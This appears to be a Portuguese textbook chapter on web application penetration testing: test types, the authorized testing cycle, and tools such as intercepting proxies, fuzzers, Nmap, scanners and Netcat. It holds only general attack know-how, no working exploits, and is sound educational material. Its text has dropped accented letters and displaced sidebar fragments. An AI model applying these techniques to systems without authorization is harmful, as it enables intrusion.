1 Teste caixa-branca: neste tipo de teste, todas as informaes do alvo so fornecidas
ao auditor, incluindo topologia de rede, plataformas utilizadas, diagramas de casos

de uso, linguagens empregadas, cdigos-fonte e endereamento interno. O objetivo
desta abordagem simular ataques que podem ser realizados por pessoas com
conhecimento privilegiado do alvo, como funcionrios e ex-colaboradores.
1 Teste caixa-cinza: este tipo de teste uma mistura dos dois anteriores, antecipando
ao auditor aquelas informaes do alvo que um atacante obteria, cedo ou tarde, em
um processo de invaso real. Desse modo, o objetivo desta modalidade acelerar a
execuo do teste, poupando o tempo gasto pelo auditor nos processos de reconhecimento e mapeamento.
A metodologia OSSTMM (Herzog, 2010) tambm considera na classificao do teste se a
equipe de segurana do ambiente alvo est consciente ou no da realizao do trabalho
pelo auditor de segurana. Com a adio desta varivel, possvel enumerar mais trs tipos
de testes, cujos focos passam a ser, total ou parcialmente, a capacidade de monitoramento e
de resposta da entidade alvo:
1 Teste duplo-cego: um teste caixa-preta, no qual a equipe de segurana do
ambiente alvo no avisada sobre a execuo do trabalho.
1 Teste duplo-cinza: um teste caixa-cinza em que a equipe de segurana do

ambiente alvo sabe o perodo e o escopo dos testes, mas no os vetores ou canais
que sero empregados pelo auditor.
1 Teste reverso: um teste em que o auditor recebe todas as informaes disponveis

sobre o alvo e no qual a equipe de segurana do ambiente alvo no notificada sobre
a realizao dos testes.
Um problema de se executar os testes sem cincia da equipe de segurana que o processo
tende a ser mais demorado, porque necessrio evadir eventuais mecanismos instalados
para deteco e bloqueio de ataques. Isso implica realizar todas as atividades de enumerao
e invaso mais lentamente, de modo a reduzir ou evitar o disparo de alertas de monitoramento de segurana. Alm disso, muitas vezes, diversos endereos de origem devem ser
empregados, o que pode dificultar muito o trabalho, pela indisponibilidade de tais recursos.
Testes de penetrao so uma ferramenta importante no desenvolvimento e manuteno
de software seguro (McGraw, 2006), evitando que vulnerabilidades sejam inseridas em

ambiente produtivo e avaliando a susceptibilidade dos sistemas a novos tipos de ataques.
Alguns padres de segurana, como o PCI DSS (PCI, 2009a) e o PCI PA-DSS (PCI, 2009b), por
exemplo, requerem testes de invaso regulares contra as aplicaes, visando o atendimento
desses objetivos. No contexto apresentado, o objetivo deste captulo introduzir uma metoTeste de Invaso de Aplicaes Web
dologia de teste de invaso de aplicaes web, abordando as fases de reconhecimento, mape-
38
amento e algumas tcnicas de descoberta de vulnerabilidades. Desse modo, o restante deste

captulo inclui, alm da discusso de metodologia, ferramentas bsicas, como proxies de interceptao e varredores de portas, e tcnicas de explorao de controles no lado cliente da aplicao.
Teste de invaso
O que se entende por teste de invaso?
Metodologia de teste de invaso

fundamental realizar testes de invaso, assim como qualquer outra atividade, de
acordo com mtodos pr-definidos, de modo a permitir que diferentes pessoas

alcancem resultados semelhantes, que possam ser reproduzidos.
Conforme j mencionado, um teste de invaso um processo cclico que envolve a execuo
de diversas atividades, como as ilustradas na Figura 2.1. Antes de prosseguir com o detalhamento de cada uma delas, porm, vale justificar, por meio de uma analogia, a necessidade
da repetio de algumas das tarefas que compem um teste de invaso.
Imagine-se uma pessoa que queira escalar uma montanha e apreciar a vista privilegiada do
topo. Inicialmente, ela deve reconhecer e mapear pontos intermedirios que possam ser
alcanados, limitando-se ao que possvel enxergar a partir da base. Em seguida, ela deve
identificar caminhos que a conduzam aos lugares mapeados e percorr-los para atingi-los.
Nesta nova posio, tem-se uma vista maior do horizonte e a pessoa capaz de vislumbrar
novas regies para as quais se dirigir, repetindo as etapas anteriores. Note-se que, a cada
iterao, ela se aproxima mais e mais do cume e consegue ver muito mais do que circunda a
montanha. Haver vezes, porm, que a partir de certos lugares, no ser possvel progredir
e ela ter de retornar um ou mais passos, para continuar. Tudo isso ocorre de maneira
similar em um pentest!
Documentao
Denio de escopo
e autorizao
Reconhecimento
Explorao de
vulnerabilidades
Mapeamento
Identicao de
vulnerabilidades
Apresentao de resultados
O primeiro passo, antes de iniciar qualquer teste de invaso, obter do cliente, por escrito,
uma autorizao para execuo do teste e o escopo que ser coberto pela atividade.
Normalmente, isso feito por meio de um contrato assinado entre as partes, que define,
tambm, o tipo de teste que ser realizado, as premissas do trabalho (por exemplo, janelas
tcnicas que sero disponibilizadas) e os insumos que devem ser fornecidos pelo contratante,
nos casos de testes caixa-cinza ou caixa-branca. Para estes ltimos, comum solicitar, alm
da documentao da aplicao, a criao de usurios com perfis comuns e a enumerao de
um ou mais usurios privilegiados, para os testes de escalada de privilgios. Cabe ao cliente,
por sua vez, definir se a equipe de segurana interna ser avisada ou no sobre o pentest.
Outro ponto que deve ser considerado se os testes sero realizados internamente,
externamente ou a partir de ambos os posicionamentos.
Figura 2.1
Etapas de um teste
de invaso.
39
No primeiro caso, a estao de teste deve ser colocada no mesmo segmento da rede em que
ficam os usurios comuns da entidade, com o mesmo nvel de acesso lgico e fsico. J no
teste externo, o auditor recebe um acesso equivalente ao de um usurio remoto ou ao de
um possvel atacante, ou seja, todos os testes sero controlados por quaisquer mecanismos
de proteo de permetro, como firewalls e WAFs. Eventualmente, as regras desses ele-
WAF
mentos podem ser suavizadas para os endereos IP de origem, de modo a no bloque-los
Web Application Firewall

um dispositivo
que atua na camada
de aplicao com o
objetivo de identificar
e bloquear trfego
malicioso direcionado
a uma aplicao web.
Por meio da definio
de regras, capaz
de oferecer proteo
contra ataques
conhecidos, como
Injeo de SQL e XSS,
por exemplo, alm de
servir para aplicao de
correes virtuais, para
vulnerabilidades recmdescobertas e no
previstas pelo sistema.
e impedir o andamento dos testes. Um exemplo de caso em que necessrio realizar testes
internos e externos o atendimento do requisito 11 do PCI DSS (PCI, 2009a).
O trabalho propriamente dito comea com a fase de reconhecimento, cujo objetivo
levantar qualquer tipo de informao que possa auxiliar no teste de invaso.

Assim, nesta etapa, o auditor busca identificar, por exemplo, servidores que suportam a
aplicao, sistemas operacionais instalados, linguagens de programao empregadas, nomes
de potenciais usurios do sistema, regras de formao de identificadores de usurio, configuraes de softwares, conveno utilizada na atribuio de nomes de mquinas, dentre muitas
outras informaes. Todo esse levantamento realizado de diversas maneiras, incluindo
testes no prprio ambiente, testes indiretos e pesquisa em fontes de informao externas.
O prximo passo, o de mapeamento, consiste em relacionar tudo que foi coletado na etapa
anterior e criar um mapa da aplicao, que reflita a estruturao dos arquivos componentes,
as funcionalidades ofertadas, os pontos de entrada de informao e as tecnologias utilizadas.
Para isso, as informaes j coletadas devem ser complementadas com as pginas que
compem o sistema, que podem ser obtidas por mtodos manuais ou automticos. Em
caso de teste caixa-preta, na primeira iterao, comum que apenas algumas sees da
aplicao sejam mapeadas, pois ainda no se tem acesso s reas protegidas, que requerem
autenticao do usurio. Tais regies s podem ser alcanadas medida que o teste avana,
vulnerabilidades identificadas so exploradas e acesso obtido.
A partir do mapa construdo, deve-se proceder descoberta de vulnerabilidades,
nas diversas camadas que compem a aplicao.

Por exemplo, imagine-se que uma aplicao de correio eletrnico est sendo testada e as
nicas pginas mapeadas, inicialmente, so a de autenticao de usurio e a de recuperao de senha. Alm disso, considere-se que na fase de reconhecimento, descobriu-se um
diretrio conf acessvel via servidor web. No cenrio exposto, a presena das seguintes
fraquezas, pelo menos, deve ser verificada:
1 Existncia de arquivos interessantes no diretrio conf que possam conter, por exemplo,
identificadores de usurios vlidos;
1 Entropia baixa dos identificadores de sesso gerados pela aplicao;

1 Possibilidade de enumerao de usurios na tela de autenticao;
1 Perguntas fceis de serem respondidas na pgina de recuperao de senha;
1 Pginas de autenticao de usurio e de recuperao de senhas vulnerveis injeo de SQL;
1 Aceitao pela aplicao de identificadores de sesso fixados pelo usurio;
1 Presena de parmetros na requisio, que possam ser adulterados pelo auditor;
1 Pginas diretamente acessveis, sem a necessidade de autenticao.
O guia de testes do OWASP (Meucci et al., 2008), que base do presente texto, enumera verificaes para cerca de setenta vulnerabilidades, agrupadas nas seguintes classes, as quais
sero cobertas ao longo deste curso:
40
1 Levantamento de informaes culminam na revelao de informaes relevantes a

um atacante. Exemplo: exibio de comando SQL ao usurio, devido a erro causado por
sintaxe incorreta.
1 Gerenciamento de configurao parmetros definidos de maneira insegura em

qualquer das plataformas que compem a aplicao permitem subverter mecanismos de
segurana ou obter acesso direto infraestrutura subjacente. Exemplo: servidor SSL/TLS
que aceita cifras nulas na proteo do canal.
1 Autenticao fraquezas que permitem que um atacante seja reconhecido como um

usurio legtimo do sistema, sem conhecimento prvio da senha. Exemplo: tela de autenticao vulnervel injeo de SQL.
Web service um
componente de
software descrito em
WSDL que fornece um
servio acessvel pela
rede a outros servios
e aplicaes.
Asynchronous
JavaScript and XML
(AJAX) compreende um
conjunto de tecnologias utilizadas com o
objetivo de permitir a
criao de aplicaes
interativas, que
buscam informaes
no servidor de
maneira assncrona,
por meio de Javascript.
Estas podem ser
formatadas como
documentos XML ou
HTML, por exemplo, e
utilizadas para
atualizar dinamicamente a pgina com a
qual o usurio est
interagindo.
1 Gerenciamento de sesses tem origem no tratamento inseguro dos identificadores

de sesso em algum ponto do ciclo de vida deles, resultando em acesso no autorizado
a funcionalidades e informaes. Exemplo: uso de nmeros sequenciais para identificadores de sesso.
1 Autorizao vulnerabilidades que possibilitam que algum sem os devidos privilgios

realize uma operao ou acesse uma informao. Exemplo: sistema que desabilita itens
de menu de acordo com verificao inicial de privilgios, mas que no valida as requisies, quando realizadas.
1 Lgica de negcios erros na implementao das regras de negcio fornecem um

caminho para que elas no sejam honradas por usurios maliciosos. Exemplo: loja de
comrcio eletrnico que no verifica se o preo de um produto negativo.
1 Validao de dados esta classe engloba os problemas decorrentes do uso de informaes fornecidas por usurios, sem as validaes necessrias, e pode acarretar desde
o vazamento de informaes at o comprometimento de outros usurios do ambiente.
Exemplo: informao usada diretamente na construo de uma consulta SQL, permitindo a injeo de comandos arbitrrios.
1 Negao de servio falhas que podem ser usadas para impedir o uso da aplicao,
normalmente, pela exausto de recursos. Exemplo: sistema que no verifica memria
disponvel antes de realizar alocao dinmica.
1 Web services e AJAX de modo geral, so afetados por variaes das vulnerabilidades
tradicionais, com algumas peculiaridades de cada tecnologia. Exemplo: web service que
no valida se a mensagem bem formada, antes de process-la.
A ltima fase do ciclo compreende a explorao, quando possvel, das vulnerabilidades
importante notar que o processo no deve parar quando um ataque for bem-sucedido, pois,
o objetivo do teste de invaso encontrar o mximo de caminhos possveis que possam levar
a um comprometimento da aplicao, dos usurios ou do ambiente. Assim, tomando-se como
Sequestro de sesso
base o ltimo exemplo, mesmo que o analista execute com sucesso um sequestro de sesso,
Ataque que permite

tomar o controle
de uma sesso
estabelecida entre o
usurio e um sistema.
devido baixa entropia dos identificadores de sesso, ainda dever testar outros ataques,
como evaso da pgina de autenticao e acesso direto a recursos do sistema.
Claramente, aps executada a etapa de explorao, fundamental que o auditor de
segurana tenha obtido um maior nvel de acesso ao sistema ou uma melhor compreenso dele, que permita abord-lo por outro ngulo.
encontradas, de modo a violar requisitos implcitos ou explcitos de segurana da aplicao.
41
De outro modo, no faz sentido iniciar uma nova rodada do ciclo, uma vez que nenhum
avano foi conseguido com a ltima iterao. Caso isso acontea, a melhor estratgia
revisar tudo que foi encontrado at o momento, para detectar possveis pontos que deixaram de ser explorados, antes de dar o teste por encerrado.
Embora a identificao de vulnerabilidades e a explorao possam ser realizadas conjuntamente, e assim que esses tpicos sero abordados neste curso, recomenda-se, nos
primeiros testes, execut-los separadamente. A razo disso evitar o excitamento natural
que acomete uma pessoa frente a novas descobertas, que pode fazer com que o auditor
foque somente o objetivo que considera o ideal e desconsidere diversos outros problemas
existentes na aplicao.
Paralelamente a todas as atividades descritas, est o processo de documentao, que se
inicia com o contrato formal e permeia as quatro etapas do ciclo de teste de invaso.
Tudo que for encontrado deve constar no relatrio que ser entregue como resultado do
trabalho, incluindo aquelas vulnerabilidades que no puderam ser exploradas. Os ataques
realizados devem ser descritos de modo a permitir a reproduo pelo cliente, se desejado,
e, assim, devem conter o mximo de detalhes, como pr-condies, ferramentas utilizadas e
mtodos empregados. Normalmente, inclui-se tambm uma recomendao geral indicando
como o problema pode ser solucionado.
Por fim, e no menos importante, encontra-se a apresentao de resultados, que deve
ser ajustada de acordo com as caractersticas da audincia.

Por exemplo, aceitvel incluir detalhes tcnicos de cada explorao para o corpo tcnico
da empresa, mas no para membros da diretoria. Neste caso, normalmente, melhor
focar nos impactos decorrentes dos ataques possveis, do que nos mtodos que devem
ser empregados para aproveitar-se das vulnerabilidades presentes no ambiente. Complementarmente, uma anlise de risco quantitativa relacionada aos vetores de ataque
muito bem-vinda.
Etapas de um teste de invaso
Quais so as etapas de um teste de invaso?
Ferramentas bsicas
Para realizar qualquer teste de invaso, um conjunto mnimo de ferramentas deve

prepare um notebook, com bom processador e bastante memria, instalando uma ou
mais ferramentas de cada classe, com as quais se sinta vontade para trabalhar.
De modo geral, possvel encontrar timas solues livres, que cobrem a maior parte das
necessidades de um trabalho dessa natureza. Uma exceo a esta regra, talvez, sejam os
varredores automticos de vulnerabilidades, cujos exemplares livres ainda esto aqum dos
melhores produtos comerciais. Antes de sair comprando ferramentas carssimas, porm,
considere-se que elas so capazes de encontrar apenas os problemas mais simples, que
podem ser descritos em regras gerais, e que os itens de maior interesse ainda requerem o
conhecimento e experincia do analista.
42
estar disponvel, independentemente de serem livres ou pagas. O ideal que o auditor
No restante desta seo, ferramentas pertencentes s seguintes categorias
sero apresentadas:
1 Navegadores web.
1 Proxies de interceptao.
1 Web spiders.
1 Fuzzers.
1 Varredores de portas e servios.
1 Varredores de vulnerabilidades.
1 Outras ferramentas.
Navegadores web
Os navegadores web so uma pea fundamental de um teste de invaso de aplicaes
web, uma vez que so utilizados pelos usurios para os acessos normais aos sistemas.
Cada representante deles apresenta particularidades no uso do protocolo HTTP e na
maneira como documentos HTML so manipulados, ainda mais quando so utilizados
elementos no padronizados. Isso faz com que alguns tipos de ataques no funcionem
em todos os tipos de navegadores, e, portanto, uma boa prtica realizar os testes considerando mais de um fornecedor e verses diferentes do mesmo software.
Como atacantes, muitas vezes, querem afetar de uma s vez o maior nmero de aplicaes
e usurios, razovel esperar que os ataques sejam direcionados s plataformas mais
populares. Assim, interessante saber a fatia de mercado de cada navegador, para que os
testes sejam direcionados para os mais utilizados apenas.
H diversos estudos na internet sobre esse assunto (NetMarketShare, StatCounter, StatOwl),
mas no h um consenso entre eles para os representantes com as menores porcentagens.

Aplicando-se mdia aritmtica simples aos resultados, tem-se a seguinte classificao:
1 Microsoft Internet Explorer 56,36%

1 Mozilla Firefox 24,87%
1 Google Chrome 9,86%
1 Apple Safari 6,39%
1 Opera 1,52%
1 Microsoft Internet Explorer o navegador fornecido pela Microsoft juntamente com
Controle ActiveX
Pequeno programa que
pode ser executado em
navegadores web, com
o propsito de estender
as funcionalidades
existentes.
os sistemas operacionais Windows. Suporta controles ActiveX nativamente, uma vez

que esta uma tecnologia da mesma empresa. Dada a sua popularidade, praticamente,
todo stio e aplicao web construdo para suport-lo e, assim, importante que seja
utilizado em um teste de invaso, sobretudo quando ActiveX for empregado. Novas
funcionalidades podem ser adicionadas por meio de extenses, como HttpWatch e
TamperIE, que podem ser utilizadas para testar a segurana de aplicaes web.
1 Mozilla Firefox um rpido navegador, livre e multi-plataforma, mantido pela fundao Mozilla, ao lado de diversos outros projetos. Trabalha muito bem com a maioria
dos stios web, mas no possui suporte nativo para controles ActiveX. Apresenta diversas
funcionalidades de segurana, como bloqueio de pginas conhecidas por contedo
malicioso, navegao privativa e integrao com software antivrus. Permite adicionar
Vejamos a seguir as principais caractersticas dos navegadores mais populares:
inmeras novas funcionalidades por meio de complementos, alguns dos quais podem
43
ser utilizados em testes de invaso. Exemplos interessantes incluem Multiproxy Switch,

FoxyProxy, TamperData, HttpWatch e Add N Edit Cookies.
1 Google Chrome fornecido pelo Google, um navegador extremamente rpido e

simples, que pode ser executado em plataformas Windows e Linux. Tem crescido muito
em popularidade, apesar de ainda no conseguir operar com qualquer tipo de stio web.
Por exemplo, aplicaes web bancrias empregam comumente mdulos de segurana
que no so desenvolvidos para Chrome. Dentre os aspectos de segurana implementados, esto o aviso e bloqueio no caso de acesso a contedo malicioso, e a necessidade
de autenticao para instalao de complementos, prevenindo que malwares infectem
Malware
o navegador. Por fim, igualmente ao Firefox e ao Internet Explorer, permite adicionar
Abreviao de malicious
software, que se refere
a qualquer programa
de computador que
tem por objetivo
violar a segurana
de um ambiente,
sem consentimento
do usurio. Vrus de
computador, worms,
cavalos de troia e
spywares so exemplos
de malwares.
funcionalidades por meio de extenses.
Proxies de interceptao
Os proxies de interceptao so uma das ferramentas mais utilizadas em testes de
invaso de aplicaes web, permitindo inspecionar requisies e respostas HTTP e

alter-las conforme desejado, em tempo real. Eles so executados localmente, na
prpria estao em que roda o navegador web, e interceptam todo trfego dele baseado
em HTTP/HTTPS, dissecando o contedo de cada pacote.
Para isso, o navegador deve ser configurado para direcionar o trfego para o proxy em uso,
o que depende da verso de software utilizada. O esquema geral de funcionamento deste
tipo de ferramenta e as interaes que ocorrem entre os diversos elementos esto ilustrados na Figura 2.2.
Estao local
Navegador
web
Requisio
Resposta
Proxy de
interceptao
Requisio
Resposta
Servidor
web
No caso do protocolo HTTPS, um proxy transparente atua como um encaminhador de

pacotes TCP para o servidor destino, com o qual o navegador web estabelece o tnel SSL/TLS
fim-a-fim. Se um proxy de interceptao funcionasse da mesma maneira, no seria possvel
inspecionar o contedo da conversao, que o objetivo principal a ser alcanado por ele.
Assim, o processo precisa ser alterado para que este requisito funcional seja atendido corretamente (Stuttard e Pinto, 2007).
O primeiro passo o envio pelo navegador de uma requisio CONNECT ao proxy, que
respondida com uma mensagem com cdigo de estado 200. A partir desse momento, o
proxy simula o lado servidor do tnel SSL/TLS para o navegador e inicia, como um cliente,
44
uma segunda conexo SSL/TLS para o servidor destino original. Como as chaves criptogrficas utilizadas pelo proxy no so as verdadeiras, uma mensagem de erro exibida pelo
navegador, que deve ser ignorada (vide Figura 2.3). Durante o restante da conexo, o proxy
atua como um tradutor, recebendo os dados enviados pelo navegador, armazenando-os
para inspeo e enviando-os ao servidor destino, por meio da segunda conexo. Este fluxo
pode ser observado na Figura 2.4.
Figura 2.2
Funcionamento
de um proxy de
interceptao.
Figura 2.3
Erro do navegador
devido a acesso
HTTPS por meio
do proxy.
Estao
Proxy
Dados
Figura 2.4
Funcionamento
de proxy de
interceptao para
conexes HTTPS.
Dados
Servidor web
Dados
Dados
HTTP
HTTP
HTTP
SSL / TLS
SSL / TLS
SSL / TLS
TCP
TCP
TCP
IP
IP
IP
Enlace/Fsico
Enlace/Fsico
Enlace/Fsico
Internet
Alm da funcionalidade bsica de interceptao, estas ferramentas fornecem diversas

outras possibilidades, como a definio de filtros para seleo de mensagens, manuteno de histrico detalhado de requisies realizadas e respectivas respostas, substituio automtica de valores nas mensagens por meio de regras definidas pelo usurio,
manipulao das interceptaes diretamente no navegador e revelao de campos
escondidos, para visualizao direta no navegador (Stuttard e Pinto, 2007).
Navegador
45
Os exemplares mais sofisticados dos proxies de interceptao fazem parte de sutes
integradas de teste de aplicaes, dentre as quais pode-se citar:
1 WebScarab um arcabouo livre de ferramentas para teste de aplicaes web,

que mantido como um projeto OWASP. Como escrito na linguagem Java, pode ser
utilizado em diversos sistemas operacionais, bastando para isso haver uma mquina
virtual Java disponvel. As funcionalidades so disponibilizadas por meio de diversos
plugins, que podem ser alterados, removidos ou adicionados pelo usurio.
1 Paros um software livre, desenvolvido em Java pela Chinotec Technologies, que

prov funcionalidades de proxy de interceptao, spider e varredor de vulnerabilidades. Esta ltima, embora muito aqum do fornecido por softwares especializados
e pagos, permite encontrar problemas simples em aplicaes web como cross-site
scripting e injeo de SQL.
1 Burp Suite uma plataforma integrada de testes, desenvolvida em Java pela empresa
PortSwigger Port Security, que pode ser empregada em todas as etapas de um teste
de invaso. H uma verso gratuita, que possui somente os mdulos bsicos, e outra
paga, que conta com muito mais recursos, como o Burp Scanner e o Burp Intruder, utilizados para varredura de vulnerabilidades e intruso de aplicaes, respectivamente.
Existem alternativas mais simples a estas sutes que podem ser instaladas diretamente nos
navegadores, na forma de extenses. Elas manipulam os dados antes de serem encapsulados para transporte pela rede e, assim, permitem operar com o protocolo HTTPS, sem a
necessidade de estabelecer uma conexo com um proxy de interceptao. De maneira geral,
permitem alterar apenas os dados de requisies, mas isso mais que suficiente para testar
uma grande variedade de vulnerabilidades. O TamperIE e o TamperData so dois exemplos,
j citados neste curso, desse tipo de utilitrio.
Web spiders
Estas ferramentas, tambm chamadas de web crawlers, so empregadas na fase de
mapeamento e tm por objetivo montar automaticamente o mapa da aplicao, visitando cada pgina disponvel e realizando uma cpia local de cada recurso encontrado,
para fins de anlise posterior. Esse processo realizado facilmente para stios web com
contedo esttico, por meio de uma busca recursiva de recursos, com base nos links
existentes, limitados ao domnio de interesse.
Quando executadas para mapear aplicaes web, porm, devido natureza dinmica
destas, diversas dificuldades surgem, que nem sempre podem ser resolvidas satisfatoriamente. O problema fundamental que a ferramenta precisa entender a semntica da
pgina analisada, em vez de simplesmente procurar por referncias a outros recursos.
Assim, ela deve ser capaz de: trabalhar com navegao baseada em formulrios, parmetros ou menus gerados dinamicamente por cdigo Javascript; lidar com processos de autenticao e funcionalidades que demandam mltiplos passos para execuo; determinar o
tipo de dado aceito em campos de entrada, para fornecer valores adequados; e, interpretar
mensagens de erro que eventualmente sejam exibidas.
Mesmo que os requisitos acima possam ser satisfeitos, muito arriscado executar um
mapeamento totalmente automatizado e, assim, um mtodo hbrido deve ser utilizado, conforme ser visto posteriormente. Uma das razes para isso que, ao tentar mapear todas as
funcionalidades, uma ferramenta assim pode executar aes indesejadas e perigosas, como
remover um usurio, alterar as configuraes do sistema ou transferir fundos de uma conta
46
para outra. Alm das sutes de teste integradas j apresentadas, que tambm incluem web
spiders, o utilitrio wget e a ferramenta webshag so outros exemplos que podem ser dados.
Fuzzers
Para identificar falhas no tratamento e validao de informaes, devem ser utilizados
dados invlidos, que estejam fora dos domnios esperados pela aplicao. Por exemplo,
para um campo que aceita o dia do ms, nmeros negativos ou maiores que 31 devem
ser empregados. Em alguns casos, como no teste de cross-site scripting, um campo pode
aceitar qualquer tipo de texto, mas os dados para teste devem respeitar uma sintaxe
especfica, para que o ataque funcione.
Cabe ao analista de segurana descrever o domnio de valores a ser testado em cada item
de entrada, mas, normalmente, listas pr-definidas esto disponveis para os casos mais
comuns. Para evadir ou quebrar eventuais filtros que tenham sido implementados, diversas
representaes de um mesmo dado devem ser submetidas pela ferramenta. Isso vlido
tambm para ataques que visam explorar navegadores especficos ou a interao entre a
aplicao e as plataformas subjacentes.
Existem alguns fuzzers disponveis para uso, dentre os quais possvel citar o Spike, a plataforma Peach Fuzzing, o WebFuzzer e o mdulo do WebScarab criado com esse propsito.
Varredores de portas e servios

Um varredor de portas e servios um software que analisa uma ou mais mquinas e
identifica as portas abertas e os servios especficos que esto sendo executados em

cada uma delas. Opcionalmente, pode tambm detectar o tipo e a verso do sistema
operacional utilizado.
Analistas de segurana empregam este tipo de ferramenta para verificar se os ativos pelos
quais zelam esto executando apenas os servios autorizados, e para levantar informaes
preliminares do ambiente em testes de invaso caixa-preta e varreduras de vulnerabilidades.
O princpio de funcionamento de um varredor de portas se baseia na suposio que o
ativo implementa corretamente a camada de transporte da pilha de rede, de acordo com

a RFC 793 (Postel, 1981). Se essa premissa no atendida, e isso ocorre algumas vezes,
o processo pode gerar falsos positivos ou negativos. Tendo isso em mente, os principais
mtodos de deteco so:
1 Varredura TCP a ferramenta tenta estabelecer uma conexo TCP e, somente no

1 Varredura SYN neste mtodo, um pacote SYN enviado ao ativo, o qual deve responder com um pacote SYN-ACK, caso a porta esteja aberta. Se isso acontecer,
a ferramenta envia um RST, para que a conexo TCP no seja estabelecida.
1 Varredura UDP um pacote UDP enviado para uma porta do ativo, o qual deve
gerar uma mensagem ICMP Port Unreachable, caso esteja fechada. Se nenhuma mensagem de erro for recebida pelo aplicativo, a porta considerada aberta.
1 Varredura FIN um pacote com o flag FIN ligado enviado a uma porta e, caso
ela esteja fechada, um pacote RST deve ser devolvido pelo ativo. De outro modo, o
pacote deve ser ignorado e nenhuma resposta gerada.
Uma vez detectadas as portas abertas, a identificao dos respectivos servios pode ser
caso da negociao ser executada com sucesso, a porta considerada aberta.
realizada por meio de duas tcnicas principais: Verificao nula e Portas TCP e UDP.
47
A primeira, aplicvel ao protocolo TCP, consiste em se conectar na porta e esperar alguns

segundos, pela possibilidade de apresentao do banner de boas-vindas. Se isto ocorrer, ele
comparado contra uma base que tem o mapeamento para verses especficas de servios.
Note-se que isto pode gerar falsos positivos, caso o ativo seja configurado para exibir um
banner de outro fornecedor. O segundo mtodo, mais confivel e aplicvel a portas TCP e
UDP, resume-se em interagir com o servio e realizar a identificao, de acordo com o comportamento apresentado e com uma base de respostas caractersticas de servios conhecidos.
A ferramenta mais popular deste tipo o Nmap, criado por Gordon Fyodor Lyon e distribudo como software livre para plataformas Windows, Linux e Mac OS X. Pode ser usado
para levantar rapidamente as informaes de uma nica mquina ou de redes inteiras,
empregando os mais diversos mtodos conhecidos. A interface padro por linha de
comando, mas h interfaces grficas disponveis, como Zenmap e NmapSI.
Varredores de vulnerabilidades
Estas ferramentas tm por objetivo encontrar, de maneira automatizada, o maior
nmero possvel de vulnerabilidades em um ativo. O mecanismo bsico de funcionamento consiste no envio de requisies e anlise das respostas obtidas, em busca de
evidncias de que uma dada vulnerabilidade est presente.
Por exemplo, o varredor pode tentar acessar arquivos de exemplo instalados por padro
em uma dada plataforma e, se a solicitao for bem-sucedida, possvel concluir que h
um problema a ser resolvido. Essa estratgia tima para verificar fraquezas em softwares
de prateleira e os embutidos em hardware, uma vez que as instalaes no variam muito
de uma mquina para outra e, assim, possvel construir uma base de dados de vulnerabilidades que podem afet-los. Aplicaes web, por outro lado, tendem a ser nicas, j que
normalmente so construdas para propsitos especficos e, logo, devem ser tratadas como
tais, inviabilizando a criao de um dicionrio especfico de fraquezas.
As dificuldades encontradas em web spiders, que foram discutidas anteriormente,
tambm afetam os varredores de vulnerabilidades, mas em um grau maior, pois a tarefa

a ser executada depende da qualidade do mapeamento. Em decorrncia deste fato e do
estado-da-arte desse tipo de tecnologia, apenas algumas classes de vulnerabilidades de
aplicaes web podem ser detectadas de maneira confivel e, para qualquer classe, no
se deve esperar que todas as ocorrncias, em uma dada aplicao, sejam descobertas.
Sempre existiro casos mais sutis que dependero do conhecimento do analista de segurana
para serem identificados. Logo, importante ter em mente que as ferramentas ainda no so
capazes de substituir os seres humanos, mas sim de auxili-los em termos de produtividade.
De acordo com Stuttard e Pinto (2007), as vulnerabilidades que podem ser encontradas
48
automaticamente so aquelas para as quais possvel descrever claramente a assinatura de ataque e o resultado que deve ser verificado para inferir a presena da fraqueza,
como por exemplo:
1 Cross-site scripting refletido.

1 Alguns tipos de injeo de SQL.
1 Alguns tipos de injeo de comando.
1 Navegao e listagem de diretrios.
importante conhecer tambm os tipos de vulnerabilidades que normalmente no so detec-
tados corretamente. A lista abaixo, adaptada de Stuttard e Pinto (2007), no visa ser exaustiva:
1 Falhas no controle de acesso.

1 Problemas que, para serem explorados, precisam que parmetros sejam alterados
considerando a semntica associada.
1 Uso inadequado de criptografia.

1 Falhas de lgica decorrentes de situaes no previstas, como a remoo de um
parmetro obrigatrio.
Um estudo realizado por Doup, Cova e Vigna (2010) avaliou onze varredores de vulnerabilidades, livres e pagos, contra a aplicao WackoPicko, que desenvolveram especificamente
para os testes, contendo dezesseis vulnerabilidades de diversas classes. O trabalho
analisou, para cada ferramenta, capacidade de deteco, quantidade de falsos positivos
reportados, qualidade do mapeamento, tempo de execuo, nmero de acessos realizados,
interpretao de Javascript e criao automtica de contas de usurio. Alguns dos resultados podem ser observados na Figura 2.5, que aproveita para dar exemplos dos principais
Figura 2.5
Alguns resultados
do estudo
de Doup, Cova e
Vigna (2010).
Falsos
Tempo de
positivos
execuo (s)
14
< 1000
Comercial
10
11
< 2000
Burp
Comercial
13
< 1000
Grendel-Scan
GPLv3
15
< 1000
Hailstorm
Comercial
< 1000
Milescan
Comercial
< 1000
N-Stalker
Comercial
13
> 25000
NTOSpider
Comercial
< 2000
Paros
CAL
< 2000
w3af
GPLv2
< 2000
Webinspect
Comercial
13
215
< 2000
Ferramenta
Licena
Escore
Acunetix
Comercial
AppScan
Outras ferramentas
Outras ferramentas podem ser teis em situaes especficas:
1 Netcat
1 OpenSSL
1 Nikto
1 Metasploit Framework
H inmeras outras ferramentas disponveis, alm das apresentadas at aqui, que podem
ser teis em situaes especficas e que devem ser consideradas como parte de um cinto de
utilidades de uma pessoa que realiza testes de invaso em aplicaes web. Adicionalmente,
varredores existentes atualmente.
49
em alguns casos, pode ser necessrio personalizar uma ferramenta j existente ou criar
uma prpria e, assim, interessante dominar uma ou mais linguagens de programao.
Netcat
Utilitrio de rede distribudo sob licena GPL e considerado por muitos como o canivete suo
de redes TCP/IP, devido a sua grande versatilidade. Permite enviar e receber dados, utilizando
os protocolos TCP e UDP, em qualquer porta e com os parmetros que se queira. Alm disso,
pode ser usado independentemente ou em conjunto com outras ferramentas ou scripts e
facilmente compilvel, sem alteraes, para diversos sistemas operacionais, como Linux, BSD,
Unix e Mac OS X. Um ponto negativo, entretanto, a falta de suporte aos protocolos SSL e TLS,
mas que pode ser resolvido por meio da associao com outras ferramentas.
Como exemplo, considere-se o exerccio sobre mtodos HTTP do Captulo 1. Ele pode ser
executado com o Netcat da seguinte maneira:
nc exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
OpenSSL
Utilitrio livre que permite trabalhar com diversos algoritmos criptogrficos e com os
protocolos SSL e TLS, suprindo assim a deficincia apresentada pelo Netcat. Est disponvel
para inmeras plataformas, como Linux, BSD, Mac OS X e Windows, e empregado por
